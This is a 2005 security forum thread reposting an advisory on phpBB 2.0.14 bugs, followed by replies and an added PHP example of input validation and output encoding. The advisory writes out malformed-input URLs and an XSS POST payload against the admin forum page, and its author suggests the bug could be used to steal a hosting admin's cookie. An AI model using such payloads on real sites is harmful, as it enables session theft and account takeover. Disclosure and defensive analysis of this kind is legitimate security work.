-==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN

Posted: Sun Apr 24, 2005 2:10 am
LINUX | Moderator | Joined: May 24, 2004 | Posts: 404 | Location: Caiman

Code:
 /* --------------------------------------------------------
 [N]eo [S]ecurity [T]eam [NST]? - Advisory #14 - 17/04/05
 --------------------------------------------------------
 Program: phpBB 2.0.14
 Homepage: http://www.phpbb.com
 Vulnerable Versions: phpBB 2.0.14 & Lower versions
 Risk: Low Risk!!
 Impact: Multiple Vulnerabilities.
 
 -==phpBB 2.0.14 Multiple Vulnerabilities==-
 ---------------------------------------------------------
 
 - Description
 ---------------------------------------------------------
 phpBB is a high powered, fully scalable, and highly customizable
 Open Source bulletin board package. phpBB has a user-friendly
 interface, simple and straightforward administration panel, and
 helpful FAQ. Based on the powerful PHP server language and your
 choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
 phpBB is the ideal free community solution for all web sites.
 
 - Tested
 ---------------------------------------------------------
 localhost & many forums
 
 - Exploitation
 ---------------------------------------------------------
 -==Bad Filter of HTML Code==-
 phpBB2/profile.php?mode=viewprofile&u=\[]
 phpBB2/viewtopic.php?p=3&highlight=\[]
 #########################################################
 -==XSS==-
 POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
 forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum
 
 Some people will not find it interesting, some will, but well, I don't care, because if you
 put in some effort you know that
 you can do a lot with this, like fooling the Admin of the Hosting to get his cookie
 and then get access to whm...
 
 - References
 --------------------------------------------------------
 http://neosecurityteam.net/Advisories/Advisory-14.txt
 
 
 - Credits
 -------------------------------------------------
 Discovered by HaCkZaTaN <hck_zatan hotmail com>
 
 [N]eo [S]ecurity [T]eam [NST]? - http://neosecurityteam.net/
 
 Got Questions? http://neosecurityteam.net/
 
 Irc.gigachat.net #uruguay [NeoSecurity IRC]
 
 - Greets
 --------------------------------------------------------
 Paisterist
 Daemon21
 LINUX
 erg0t
 uyx
 CrashCool
 Makoki
 KingMetal
 r3v3ng4ns
 
 And my Colombian people
 
 @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
 '@@@@@''@@'@@@''''''''@@''@@@''@@
 '@@'@@@@@@''@@@@@@@@@'''''@@@
 '@@'''@@@@'''''''''@@@''''@@@
 @@@@''''@@'@@@@@@@@@@''''@@@@@
 */
 
 /* EOF */
 

http://neosecurityteam.net/

Posted: Wed Apr 27, 2005 7:06 pm
KingOfSka | Advanced user | Joined: Mar 13, 2005 | Posts: 61

Can't understand how to make it work lol, I get a blank profile every time I try..

Posted: Thu Apr 28, 2005 7:49 pm
gulftech | Valuable expert | Joined: Apr 20, 2005 | Posts: 9

1) Putting any non-integer-based value that doesn't return a record will result in the blank profile.

2) The regex issue in highlight is more of a bug than a security issue. I could be wrong, but I have glanced at the code and don't see it as exploitable. It is a bug though and should be fixed, I guess.

3) I have never heard of cross-site scripting when using the POST method, but I could see how POST cross-site scripting could be exploited. For example, you could have an auto-submitted form using JavaScript, but in this example a valid session id is required, so it is not exploitable.
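
Added example, not part of the thread and not phpBB's own code: one way a PHP application can handle the three inputs discussed above (a numeric id such as u=, the highlight= words, and the forumname/forumdesc fields). All function names are hypothetical, and the sample inputs at the end are constructed from the values quoted in the advisory.

```php
<?php
// Added illustration, not phpBB source; all function names are hypothetical.

function h(string $s): string
{
    // Encode for an HTML text or attribute context.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// u= / p=: accept a positive decimal integer or nothing.
function parse_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null; // caller shows "no such user" instead of querying
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// highlight=: quote every word before it becomes part of a pattern, then
// encode each piece of the text separately so markup is added only by us.
function highlight_text(string $text, string $raw_highlight): string
{
    $words = preg_split('/\s+/', $raw_highlight, -1, PREG_SPLIT_NO_EMPTY);
    if (!$words) {
        return h($text);
    }
    $quoted = array_map(fn($w) => preg_quote($w, '/'), $words);
    $parts = preg_split('/(' . implode('|', $quoted) . ')/i', $text, -1,
                        PREG_SPLIT_DELIM_CAPTURE);
    $out = '';
    foreach ($parts as $i => $part) {
        // Odd indexes are the captured matches, even indexes the text between.
        $out .= ($i % 2) ? '<b>' . h($part) . '</b>' : h($part);
    }
    return $out;
}

// forumname / forumdesc: store as submitted, encode when rendering.
function render_forum_row(string $name, string $desc): string
{
    return '<tr><td>' . h($name) . '</td><td>' . h($desc) . "</td></tr>\n";
}

// Constructed inputs, using the values quoted in the advisory.
var_dump(parse_id('\['));
echo highlight_text('See topic [3] <here>', '\[ topic'), "\n";
echo render_forum_row("<script>alert('NST')</script>", 'desc');
```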

Posted: Sat May 21, 2005 12:30 pm
Twinky | Regular user | Joined: May 20, 2005 | Posts: 5

how do i use this can sum1 plz explain

Last edited by Twinky on Sat May 21, 2005 10:40 pm; edited 1 time in total

Posted: Sat May 21, 2005 9:58 pm
g30rg3_x | Active user | Joined: Jan 23, 2005 | Posts: 31 | Location: OutSide Of The PE